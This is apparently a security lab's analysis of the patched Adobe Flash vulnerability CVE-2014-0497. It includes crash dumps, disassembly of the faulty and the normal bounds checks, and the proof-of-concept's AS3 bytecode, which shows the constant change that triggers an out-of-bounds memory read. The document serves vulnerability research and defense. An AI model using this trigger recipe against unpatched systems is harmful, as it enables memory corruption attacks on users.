Adobe Flash CVE-2014-0497 Vulnerability Analysis

Source: Internet
Author: User

Adobe Flash Player was hit by a 0-day vulnerability during the Spring Festival (CVE-2014-0497). The vulnerability affects Flash Player 12.0.0.38 and earlier versions. Adobe has released patches.

This vulnerability is caused by an error in how Flash handles the AS3 code embedded in the SWF. The AS3 code of the sample file used for this analysis can be viewed with AS3 Sorcerer. The sample uses li32 together with a ByteArray to achieve fast memory reads. According to Adobe's documentation, the parameter of li32 is an index into the ByteArray: the function reads the data at that index of the ByteArray into a variable quickly, but the index must lie between 0 and the length of the ByteArray, which means the function performs a bounds check. When Flash generates the bounds-check code it decides, from the types of the constants in the bytecode, whether the value is treated as unsigned. The sample crafts its bytecode so that incorrect unsigned comparison code is generated.

When signed comparison code is generated, the instruction "sub esi, 4" is emitted. It subtracts 4 from the array length so that reading a 4-byte int from the end of the byte array cannot run past the buffer. When the unsigned comparison code is generated, "sub esi, 80000004h" is emitted instead. esi holds the array length, 0x1000; after this instruction it becomes a negative number, that is, a very large unsigned value. The following unsigned compare-and-jump goes to the out-of-bounds handler only when the index is greater than the length, and because the "length" is now far greater than the index, execution continues: data outside the array is read and the out-of-bounds access occurs.
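The following C model of the two emitted check sequences is an added illustration, not code from the analysis or from Flash Player. It performs the same 32-bit wrapping subtraction and unsigned "ja" comparison as the disassembly, with the array length 0x1000 from the sample, so the reader can see which indices each variant lets through. The function names and the probe indices are assumptions made here.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Model of the emitted li32 bounds check (added illustration, not Flash
 * Player's code). All arithmetic is 32-bit and wraps, exactly like the
 * esi/eax registers in the disassembly. "ja" is an unsigned comparison:
 * the access is rejected (jump to the out-of-bounds handler) when
 * index > limit as unsigned values. */
static bool li32_access_rejected(uint32_t array_len, uint32_t index, uint32_t sub_const)
{
    uint32_t limit = array_len - sub_const;   /* sub esi, <const>            */
    return index > limit;                     /* cmp eax, esi ; ja (unsigned) */
}

/* What ends up in esi after the subtraction, for inspection. */
static uint32_t li32_limit(uint32_t array_len, uint32_t sub_const)
{
    return array_len - sub_const;
}

/* Normal code: "sub esi, 4" -- the last valid index for a 4-byte read is len-4. */
static bool li32_rejected_normal(uint32_t array_len, uint32_t index)
{
    return li32_access_rejected(array_len, index, 4u);
}

/* Faulty code from the sample: "sub esi, 80000004h". For len = 0x1000 the
 * limit wraps to 0x80000FFC, so any index below that value passes the check. */
static bool li32_rejected_faulty(uint32_t array_len, uint32_t index)
{
    return li32_access_rejected(array_len, index, 0x80000004u);
}

int main(void)
{
    const uint32_t len = 0x1000;   /* ByteArray.length = 4096, as set in the bytecode */
    /* Constructed probe indices: in bounds, last valid, first invalid, far out, "negative". */
    const uint32_t probes[] = { 0x0u, 0xFFCu, 0xFFDu, 0x10000u, 0xFFFFFFF0u };

    printf("normal limit = %08x, faulty limit = %08x\n",
           (unsigned)li32_limit(len, 4u), (unsigned)li32_limit(len, 0x80000004u));
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("index %08x: normal %s, faulty %s\n", (unsigned)probes[i],
               li32_rejected_normal(len, probes[i]) ? "rejected" : "allowed",
               li32_rejected_faulty(len, probes[i]) ? "rejected" : "allowed");
    return 0;
}
```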

Crash:

(17c.5e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=8357e000 ebx=0357e000 ecx=02bcbaf0 edx=80002100 esi=80000000 edi=02843fc8
eip=02e5f45e esp=0012e728 ebp=0012e8c0 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00250286
02e5f45e 8b0410          mov     eax,dword ptr [eax+edx] ds:0023:03580100=********

Content in the array:

06cc4000  6f6d336d 00007972 00000000 00000000  m3mory..........
06cc4010  00000000 00000000 00000000 00000000  ................
06cc4020  00000000 00000000 00000000 00000000  ................
06cc4030  00000000 00000000 00000000 00000000  ................
06cc4040  00000000 00000000 00000000 00000000  ................
06cc4050  00000000 00000000 00000000 00000000  ................
06cc4060  00000000 00000000 00000000 00000000  ................
06cc4070  00000000 00000000 00000000 00000000  ................

When the vulnerability triggers, the value at the specified index is read relative to the array address in eax, and that address is not accessible.

0:000> kv
ChildEBP RetAddr  Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0012e8c0 009d9231 066db910 00000000 0012e910 0x682cefc
0012e8e4 009d9f85 066db910 00000000 0012e910 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0x10beb1
0012e938 009d9a1e 066db910 00000000 0012e98c Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0x10cc05
0012e974 009c26fd 00000000 0012e98c 06663180 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0x10c69e
0012ea20 009c45be 01a23020 0191c1f0 00000000 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0xf537d
0012ea4c 0048ced4 018fb060 00000001 018fb060 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0xf723e
0012eae8 0048d32b 018fb060 0012ecc4 00000000 Flash_player_12_0!WinMainSandboxed+0x89be8
0012eb18 0048dd4c 00000008 00000000 0012ecc4 Flash_player_12_0!WinMainSandboxed+0x8a03f
0012ec7c 00426f3b 018fd0a0 07ffffff 07ffffff Flash_player_12_0!WinMainSandboxed+0x8aa60
00000000 00000000 00000000 00000000 00000000 Flash_player_12_0!WinMainSandboxed+0x23c4f

Stack backtrace (code around the return address 009d9231):

009d9220 8b4d10   mov     ecx,dword ptr [ebp+10h]
009d9223 8b5008   mov     edx,dword ptr [eax+8]
009d9226 8b5204   mov     edx,dword ptr [edx+4]
009d9229 51       push    ecx
009d922a 8b4d0c   mov     ecx,dword ptr [ebp+0Ch]
009d922d 51       push    ecx
009d922e 50       push    eax
009d922f ffd2     call    edx            // call into the dynamically generated code
009d9231 83c40c   add     esp,0Ch

Before the AS3 function TestExploit() is parsed, Flash parses other code first, such as function script0$init():*; TestExploit() is entered only after that code has been parsed.

Therefore execution enters the dynamically generated code area several times. The researcher can record EDX on each entry; when the crash occurs, go to the last recorded EDX code area and analyze it. Flash's timer and its own runtime mechanisms have a large effect on the results when studying the vulnerability, so the breakpoint must be found quickly during debugging. The overflow location sits at a fixed offset from the EDX code area, so once the generated code is entered, a breakpoint at that offset tracks down the overflow location quickly.

Bytecode:

6  constructsuper (0)
8  pushuint 2147483648                  // 0x80000000; in the modified bytecode the double constant was changed to uint
10 setlocal1
11 findpropstrict flash.utils::ByteArray       // nameIndex = 2
13 constructprop flash.utils::ByteArray (0)    // nameIndex = 2
16 coerce flash.utils::ByteArray               // nameIndex = 2
18 setlocal2
19 getlocal2
20 pushshort 4096
23 setproperty length                   // nameIndex = 7
25 getlocal2
26 pushstring "m3mory"                  // stringIndex = 18; the array contents are assigned
28 callpropvoid category (1)            // nameIndex = 8
31 getlex flash.system::ApplicationDomain      // nameIndex = 13
33 getproperty currentDomain            // nameIndex = 5
35 getlocal2
36 setproperty domainMemory             // nameIndex = 6
38 getlocal1
39 pushint 2147475196                   // subtracted from the variable to obtain the index, which is pushed and passed to li32
41 subtract
42 li32                                 // here the bounds comparison on the index passed in fails to reject the out-of-range index
43 setlocal3
44 getlocal1
45 pushshort 8448
48 add
49 li32
50 pushint 305419896                    // 0x12345678
52 ifne L1

 

Dynamically generated code for the sample:

0682ced3 8b5014        mov     edx,dword ptr [eax+14h]    // base address of the array data
0682ced6 8b7018        mov     esi,dword ptr [eax+18h]    // array length
0682ced9 8d8300210080  lea     eax,[ebx-7FFFDF00h]        // ebx = local4; the value constructed in eax is used as the index for reading the array
0682cedf 81ee04000080  sub     esi,80000004h              // because a 4-byte int is read from the byte array, the last valid index is length-4; the crafted bytecode makes the code subtract 80000004h instead of 4, esi becomes negative, and the unsigned comparison below is used for the bounds check
0682cee5 3bc6          cmp     eax,esi                    // compare the index with the (wrapped) array length
0682cee7 8bb5dcfeffff  mov     esi,dword ptr [ebp-124h]
0682ceed 0f878b000000  ja      0682cf7e                   // jump to the out-of-bounds handler if eax > esi (unsigned); after the subtraction above the limit has wrapped to a huge value, so the jump is not taken
0682cef3 8bc2          mov     eax,edx                    // eax = array data address
0682cef5 03c3          add     eax,ebx                    // ebx is the value constructed in the PoC
0682cef7 bb00210080    mov     ebx,80002100h              // address offset
0682cefc 8b0418        mov     eax,dword ptr [eax+ebx] ds:0023:06cd4000=????????   // the read; the PoC chooses a distance large enough to read past the array every time
0682ceff 894588        mov     dword ptr [ebp-78h],eax

Assembly code generated from normal AS3:

06b39f0e 8b45c8        mov     eax,dword ptr [ebp-38h]
06b39f11 8b5314        mov     edx,dword ptr [ebx+14h]
06b39f14 8b7318        mov     esi,dword ptr [ebx+18h]
06b39f17 8d9805210080  lea     ebx,[eax-7FFFDEFBh]
06b39f1d 8bfe          mov     edi,esi
06b39f1f 83ef04        sub     edi,4                      // here 4 is subtracted instead of 80000004h
06b39f22 3bdf          cmp     ebx,edi
06b39f24 7768          ja      06b39f8e
06b39f26 8bda          mov     ebx,edx
06b39f28 03d8          add     ebx,eax
06b39f2a bf05210080    mov     edi,80002105h
06b39f2f 8b1c3b        mov     ebx,dword ptr [ebx+edi]

The cause of this vulnerability is that Flash mishandles signed versus unsigned values when it generates the access check, so the signed integer underflows. By editing the bytecode of the swf file with a bytecode modification tool and changing the signed constant to an unsigned one, the faulty check is produced at code-generation time.

The bytecode generated from a normal AS3 file, and the modified bytecode:

normal AS3 bytecode:  pushdouble 2147483648   // 0x80000000
modified bytecode:    pushuint   2147483648   // 0x80000000

By Jason & hcl of code audit labs of vulnhunt.com
